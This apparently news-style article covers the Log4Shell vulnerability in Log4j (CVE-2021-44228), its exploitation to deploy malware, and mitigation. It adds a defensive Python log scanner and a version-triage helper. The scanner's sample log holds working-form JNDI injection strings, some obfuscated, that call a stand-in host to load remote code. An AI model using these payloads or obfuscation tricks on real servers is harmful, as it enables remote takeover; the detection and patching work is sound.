Hackers Exploiting Log4j 0-day Flaw to deploy Malware on Vulnerable Servers

A newly disclosed 0-day in the popular Java logging library Log4j lets attackers execute code remotely and take full control of the affected server.
Log4j is part of Apache Logging Services and is widely used by both enterprise applications and cloud services.
A security researcher disclosed the 0-day flaw on Twitter, and a proof-of-concept (PoC) exploit was posted on GitHub. The flaw is tracked as CVE-2021-44228 and has been dubbed Log4Shell or LogJam.
Impact of the Flaw
The vulnerability affects many frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.
It also affects popular services and apps run by Apple, Amazon, Cloudflare, Twitter, and Steam.
PoC
(Image: a server running a Log4j version vulnerable to the attack)
Hackers Exploiting Log4j 0-day to Deploy Malware
Attackers have now begun mass-scanning for the Log4Shell vulnerability, both to locate vulnerable servers and to deploy malware on them.
Netlab 360 observed the vulnerability being exploited to install Mirai and Muhstik malware on vulnerable devices.
Microsoft Threat Intelligence Center reported that the Log4j vulnerability can be used to deploy Cobalt Strike beacons.
Cloudflare CEO Matthew Prince tweeted that the earliest evidence "we've found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure."
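Scanning for Log4Shell leaves a recognisable trace in web-server logs: a Log4j lookup string such as ${jndi:ldap://host/x} in any request field that ends up in a log message (User-Agent, URI, X-Forwarded-For, and so on). Scanners routinely hide it behind URL encoding and nested lookups (${lower:j}, ${::-j}, ${env:X:-j}), so a naive grep for "${jndi:" misses much of the traffic. The following is an added example (not code from the original article or from any of the vendors it cites) that undoes those layers before matching and extracts the callback scheme and host as an indicator. The log lines, IP addresses and hostnames in it are constructed for the example.

```python
"""Scan web-server logs for Log4Shell (CVE-2021-44228) exploitation attempts.

Added example: de-obfuscates URL-encoded and nested Log4j lookups, then looks
for a ${jndi:<scheme>://<host>...} callback. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote
from typing import List, Optional, Tuple

# Innermost ${...} lookup, i.e. one that contains no further braces or '$'.
_INNER = re.compile(r"\$\{([^{}$]*)\}")
# The de-obfuscated payload: ${jndi:ldap://198.51.100.7:1389/a}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/:}\s]+)", re.IGNORECASE)


def _resolve_inner(m) -> str:
    """Evaluate the obfuscation lookups attackers use to assemble 'jndi'."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):           # ${lower:J} -> j
        return body[6:].lower()
    if low.startswith("upper:"):           # ${upper:l} -> L
        return body[6:].upper()
    if ":-" in body:                       # ${::-j}, ${env:NOPE:-j} -> default value j
        return body.split(":-", 1)[1]
    return m.group(0)                      # unknown lookup: keep it so ${jndi:...} survives


def normalize(s: str, max_rounds: int = 20) -> str:
    """Undo (possibly repeated) URL encoding and nested lookups until stable."""
    for _ in range(max_rounds):
        nxt = _INNER.sub(_resolve_inner, unquote(s))
        if nxt == s:
            return s
        s = nxt
    return s


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, host) of the JNDI callback if the line carries a payload."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, scheme, callback host) for every line with a payload."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed Apache-style access log: one benign request, then three probes
# (plain, nested-lookup obfuscated, and URL-encoded with a ${::-j} default trick).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:01:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:01:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:01:11 +0000] '
    '"GET /${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/o} HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:12:01:13 +0000] '
    '"GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 200 612 "-" "-"',
]

if __name__ == "__main__":
    for lineno, scheme, host in scan(SAMPLE_LOG):
        print(f"line {lineno}: JNDI callback {scheme}://{host}")
</test>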
Mitigation
CVE-2021-44228 has been addressed in Log4j 2.15.0; users are urged to upgrade immediately.
CVE-2021-44228 can only be exploited when message lookups are enabled, i.e. when the log4j2.formatMsgNoLookups property is false. Log4j 2.15.0 disables message lookups by default (the property effectively defaults to true), which is what blocks the attack.
This means that Log4j users who upgrade to 2.15.0 and then explicitly set the flag back to false become vulnerable again.
Users who have not yet upgraded can block these attacks on older releases by setting the flag to true, either as the JVM system property log4j2.formatMsgNoLookups=true or as the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. Note that this property is only honoured from Log4j 2.10.0 onward; on earlier 2.x releases it has no effect and upgrading is the only fix. By default, all older versions leave this property set to false and are therefore vulnerable.
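When triaging a fleet, the rules above (lookups off by default from 2.15.0, the flag only honoured from 2.10.0, and the flag reversible on a patched release) are easy to get wrong by hand. The following is an added example, not code from the Log4j project or the article, that encodes them as a small assessment helper taking the Log4j version, the JVM arguments and the process environment. It assumes that a -D system property takes precedence over the environment variable when both are set; verify that on your own JVM if you rely on it.

```python
"""Triage helper for CVE-2021-44228 (Log4Shell).

Added example. Encodes the mitigation rules: the bug is reachable only when
message lookups are enabled; lookups are off by default from 2.15.0; on
2.10.0 - 2.14.x they can be switched off with log4j2.formatMsgNoLookups=true
(or LOG4J_FORMAT_MSG_NO_LOOKUPS=true); versions before 2.10.0 ignore the flag.
Assumption: a -D property overrides the environment variable when both exist.
"""
import re
from typing import Iterable, Mapping, Optional, Tuple

PROP = "log4j2.formatMsgNoLookups"
ENV = "LOG4J_FORMAT_MSG_NO_LOOKUPS"


def parse_version(v: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.15' -> (2, 15, 0); '2.0-beta9' -> (2, 0, 0)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {v!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def _flag_value(jvm_args: Iterable[str], env: Mapping[str, str]) -> Optional[bool]:
    """True/False if the flag is explicitly set, None if it is left at the default."""
    for arg in jvm_args:                              # assumed precedence: -D wins
        if arg.startswith(f"-D{PROP}="):
            return arg.split("=", 1)[1].strip().lower() == "true"
    if ENV in env:
        return env[ENV].strip().lower() == "true"
    return None


def assess(version: str, jvm_args: Iterable[str] = (), env: Optional[Mapping[str, str]] = None) -> str:
    """Classify a host as one of: not-affected, patched, mitigated-by-flag,
    vulnerable, vulnerable-flag-ignored, vulnerable-lookups-reenabled."""
    ver = parse_version(version)
    if ver < (2, 0, 0):
        return "not-affected"                          # CVE-2021-44228 is a Log4j 2.x bug
    flag = _flag_value(jvm_args, env or {})
    if ver >= (2, 15, 0):
        # lookups are off by default; setting the flag to false turns them back on
        return "vulnerable-lookups-reenabled" if flag is False else "patched"
    if ver >= (2, 10, 0):
        return "mitigated-by-flag" if flag is True else "vulnerable"
    # 2.0-beta9 .. 2.9.x: the property is not read, so flag=true is false comfort
    return "vulnerable-flag-ignored" if flag is True else "vulnerable"


if __name__ == "__main__":
    # Constructed inventory: (hostname, version, JVM args, environment)
    hosts = [
        ("app-01", "2.14.1", [], {}),
        ("app-02", "2.14.1", ["-Dlog4j2.formatMsgNoLookups=true"], {}),
        ("app-03", "2.9.1", [], {"LOG4J_FORMAT_MSG_NO_LOOKUPS": "true"}),
        ("app-04", "2.15.0", ["-Dlog4j2.formatMsgNoLookups=false"], {}),
    ]
    for name, ver, args, environ in hosts:
        print(f"{name}: log4j {ver} -> {assess(ver, args, environ)}")
</test>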